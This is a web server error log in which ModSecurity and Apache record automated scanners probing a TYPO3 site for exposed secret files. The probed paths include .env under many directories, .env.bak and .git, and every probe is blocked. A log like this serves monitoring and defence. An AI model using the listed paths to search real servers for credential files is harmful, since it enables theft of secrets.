[Sun Nov 23 04:55:08.656436 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxwAAAAE"]
[Sun Nov 23 04:55:08.656706 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxwAAAAE"]
[Sun Nov 23 04:55:08.656907 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxwAAAAE"]
[Sun Nov 23 04:55:09.181828 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aSKFnTKJUjhaVaDyHaHyyAAAAAE"]
[Sun Nov 23 04:55:09.182072 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aSKFnTKJUjhaVaDyHaHyyAAAAAE"]
[Sun Nov 23 04:55:09.182276 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aSKFnTKJUjhaVaDyHaHyyAAAAAE"]
[Sun Nov 23 04:55:10.022546 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aSKFnjKJUjhaVaDyHaHyyQAAAAE"]
[Sun Nov 23 04:55:10.022813 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aSKFnjKJUjhaVaDyHaHyyQAAAAE"]
[Sun Nov 23 04:55:10.023029 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aSKFnjKJUjhaVaDyHaHyyQAAAAE"]
[Sun Nov 23 04:55:12.352514 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZgAAAAM"]
[Sun Nov 23 04:55:12.352875 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZgAAAAM"]
[Sun Nov 23 04:55:12.353118 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZgAAAAM"]
[Sun Nov 23 04:55:12.938729 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZwAAAAM"]
[Sun Nov 23 04:55:12.938996 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZwAAAAM"]
[Sun Nov 23 04:55:12.939200 2025] [:error] [pid 266320] [client 45.148.10.143:53970] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSKFoJI5j_0ed6X_RLk8ZwAAAAM"]
[Sun Nov 23 04:55:15.804960 2025] [:error] [pid 266343] [client 45.148.10.143:59924] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSKFo29UlIruL7JTxnXgWQAAAAY"]
[Sun Nov 23 04:55:15.805196 2025] [:error] [pid 266343] [client 45.148.10.143:59924] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSKFo29UlIruL7JTxnXgWQAAAAY"]
[Sun Nov 23 04:55:15.805380 2025] [:error] [pid 266343] [client 45.148.10.143:59924] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSKFo29UlIruL7JTxnXgWQAAAAY"]
[Sun Nov 23 04:55:18.425507 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aSKFpowvuenqv5uaxq8iLwAAAAk"]
[Sun Nov 23 04:55:18.425759 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aSKFpowvuenqv5uaxq8iLwAAAAk"]
[Sun Nov 23 04:55:18.425941 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aSKFpowvuenqv5uaxq8iLwAAAAk"]
[Sun Nov 23 04:55:19.522102 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aSKFp4wvuenqv5uaxq8iMAAAAAk"]
[Sun Nov 23 04:55:19.522372 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aSKFp4wvuenqv5uaxq8iMAAAAAk"]
[Sun Nov 23 04:55:19.522586 2025] [:error] [pid 267135] [client 45.148.10.143:59938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aSKFp4wvuenqv5uaxq8iMAAAAAk"]
[Sun Nov 23 04:55:26.404444 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aSKFrs8Kqje0bNpeh30-KgAAAAA"]
[Sun Nov 23 04:55:26.404680 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aSKFrs8Kqje0bNpeh30-KgAAAAA"]
[Sun Nov 23 04:55:26.404871 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aSKFrs8Kqje0bNpeh30-KgAAAAA"]
[Sun Nov 23 04:55:27.363771 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aSKFr88Kqje0bNpeh30-KwAAAAA"]
[Sun Nov 23 04:55:27.364035 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aSKFr88Kqje0bNpeh30-KwAAAAA"]
[Sun Nov 23 04:55:27.364244 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aSKFr88Kqje0bNpeh30-KwAAAAA"]
[Sun Nov 23 04:55:28.380838 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSKFsM8Kqje0bNpeh30-LAAAAAA"]
[Sun Nov 23 04:55:28.381085 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSKFsM8Kqje0bNpeh30-LAAAAAA"]
[Sun Nov 23 04:55:28.381293 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSKFsM8Kqje0bNpeh30-LAAAAAA"]
[Sun Nov 23 04:55:29.452928 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aSKFsc8Kqje0bNpeh30-LQAAAAA"]
[Sun Nov 23 04:55:29.453164 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aSKFsc8Kqje0bNpeh30-LQAAAAA"]
[Sun Nov 23 04:55:29.453377 2025] [:error] [pid 266317] [client 45.148.10.143:35728] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aSKFsc8Kqje0bNpeh30-LQAAAAA"]
[Sun Nov 23 04:55:30.317589 2025] [authz_core:error] [pid 266317] [client 45.148.10.143:35728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Nov 25 18:17:59.867319 2025] [authz_core:error] [pid 322338] [client 35.237.76.28:56606] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Nov 25 19:03:35.357851 2025] [authz_core:error] [pid 314114] [client 167.71.211.86:52959] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Tue Nov 25 19:03:37.907398 2025] [authz_core:error] [pid 322329] [client 167.71.211.86:62852] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Thu Nov 27 04:11:49.134159 2025] [authz_core:error] [pid 353188] [client 54.236.248.190:54490] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 27 04:11:49.574630 2025] [:error] [pid 353184] [client 54.236.248.190:54640] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSfBdYG5PbbCKE0XPKZgaAAAAAA"]
[Thu Nov 27 04:11:49.574903 2025] [:error] [pid 353184] [client 54.236.248.190:54640] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSfBdYG5PbbCKE0XPKZgaAAAAAA"]
[Thu Nov 27 04:11:49.575102 2025] [:error] [pid 353184] [client 54.236.248.190:54640] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSfBdYG5PbbCKE0XPKZgaAAAAAA"]
